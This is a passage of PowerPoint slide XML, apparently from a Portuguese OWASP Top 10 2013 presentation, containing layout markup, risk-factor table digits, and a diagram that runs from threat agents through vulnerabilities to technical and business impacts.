                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>0</a:t>
                      </a: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smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>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smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>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smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a: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smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>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000" b="1" kern="0" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>*</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>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smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a: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smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>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smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>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smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>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smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>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smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>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smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>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smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>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a:solidFill>
                          <a:schemeClr val="tx2"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="27650" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8" cstate="print">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="FFFFFF"/>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
          </a:blip>
          <a:srcRect t="34128" r="22830" b="30544"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1756169" y="7620000"/>
            <a:ext cx="2322514" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8" cstate="print">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="FFFFFF"/>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
          </a:blip>
          <a:srcRect t="34128" r="22830" b="30544"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2828028" y="8229600"/>
            <a:ext cx="2322514" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Rectangle 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3819206" y="8674855"/>
            <a:ext cx="340158" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Notas Sobre Riscos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="68" name="Group 26"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="42540" y="6292012"/>
            <a:ext cx="6669804" cy="525268"/>
            <a:chOff x="14975" y="1014596"/>
            <a:chExt cx="6670153" cy="525104"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="69" name="Group 28"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="14975" y="1014596"/>
              <a:ext cx="6670153" cy="525104"/>
              <a:chOff x="14975" y="997424"/>
              <a:chExt cx="6670153" cy="525104"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="72" name="Rectangle 116"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2879691" y="1073600"/>
                <a:ext cx="1020816" cy="380881"/>
              </a:xfrm>
              <a:prstGeom prst="rect">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a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Vulnerabilidades</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t/>
                </a:r>
                <a:br>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>        de Segurança</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="73" name="Group 63"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="476250" y="997424"/>
                <a:ext cx="139700" cy="304800"/>
                <a:chOff x="96" y="1344"/>
                <a:chExt cx="288" cy="624"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="82" name="Oval 64"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="145" y="1344"/>
                  <a:ext cx="190" cy="192"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050" algn="ctr">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="83" name="Line 65"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1536"/>
                  <a:ext cx="0" cy="240"/>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84" name="Line 66"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="96" y="1776"/>
                  <a:ext cx="144" cy="192"/>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85" name="Line 67"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1776"/>
                  <a:ext cx="144" cy="192"/>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86" name="Line 68"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="96" y="1633"/>
                  <a:ext cx="288" cy="0"/>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grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="74" name="AutoShape 163"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1309572" y="1078361"/>
                <a:ext cx="838244" cy="357076"/>
              </a:xfrm>
              <a:prstGeom prst="rightArrowCallout">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 20889"/>
                  <a:gd name="adj2" fmla="val 24667"/>
                  <a:gd name="adj3" fmla="val 34667"/>
                  <a:gd name="adj4" fmla="val 8013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Vetores </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t> de Ataque</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="75" name="AutoShape 85"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4800666" y="1049795"/>
                <a:ext cx="685836" cy="428491"/>
              </a:xfrm>
              <a:prstGeom prst="can">
                <a:avLst>
                  <a:gd name="adj" fmla="val 250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Impactos</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>  Técnicos</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="76" name="AutoShape 108"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="761855" y="1262453"/>
                <a:ext cx="535016" cy="1588"/>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77" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="2189093" y="1262453"/>
                <a:ext cx="630270" cy="1588"/>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78" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="72" idx="3"/>
                <a:endCxn id="75" idx="2"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="3900507" y="1264041"/>
                <a:ext cx="900159"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sp>
            <p:nvSpPr>
              <p:cNvPr id="79" name="Rectangle 89"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="14975" y="1322855"/>
                <a:ext cx="1132100" cy="199673"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>Agentes </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>de </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>Ameaça</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="80" name="AutoShape 142"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5923088" y="1073600"/>
                <a:ext cx="762040" cy="380881"/>
              </a:xfrm>
              <a:prstGeom prst="foldedCorner">
                <a:avLst>
                  <a:gd name="adj" fmla="val 125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lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Impactos</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>no Negócio</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="81" name="AutoShape 149"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="75" idx="4"/>
                <a:endCxn id="80" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5486502" y="1264041"/>
                <a:ext cx="436586"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
          <p:nvSpPr>
            <p:cNvPr id="70" name="AutoShape 117"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2879691" y="1090772"/>
              <a:ext cx="220675" cy="380881"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrowCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 47538"/>
                <a:gd name="adj2" fmla="val 51293"/>
                <a:gd name="adj3" fmla="val 57006"/>
                <a:gd name="adj4" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>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endParaRPr lang="pt-BR" sz="900" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="71" name="Rectangle 30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2862228" y="1235189"/>
              <a:ext cx="109543" cy="9522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dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13546696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 name="Table 33"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3886256873"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1088710"/>
          <a:ext cx="6858000" cy="1349690"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000"/>
              </a:tblGrid>
              <a:tr h="343850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
                        <a:t>Top 10 Sumário de</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Fator de Risco</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>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rgbClr val="D9EAD5"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="95155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1000" dirty="0" smtClean="0"/>
                        <a:t>A tabela a seguir apresenta um resumo dos Top 10 2013 de Riscos de Segurança em Aplicações e os fatores de risco que foram atribuídos a cada risco. Esses fatores foram determinados com base nas estatísticas disponíveis e na experiência da equipe OWASP Top 10. Para compreender esses riscos em uma aplicação ou organização em particular, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" u="sng" dirty="0" smtClean="0"/>
                        <a:t>você deve considerar seus próprios agentes de ameaça e impactos no negócio</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>. Mesmo falhas flagrantes de software podem não representar um risco sério se não houver agentes de ameaça em uma posição de realizar o ataque necessário, ou o impacto no negócio é insignificante para os ativos envolvidos.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Title 62"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Detalhes Sobre Fatores de Risco</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
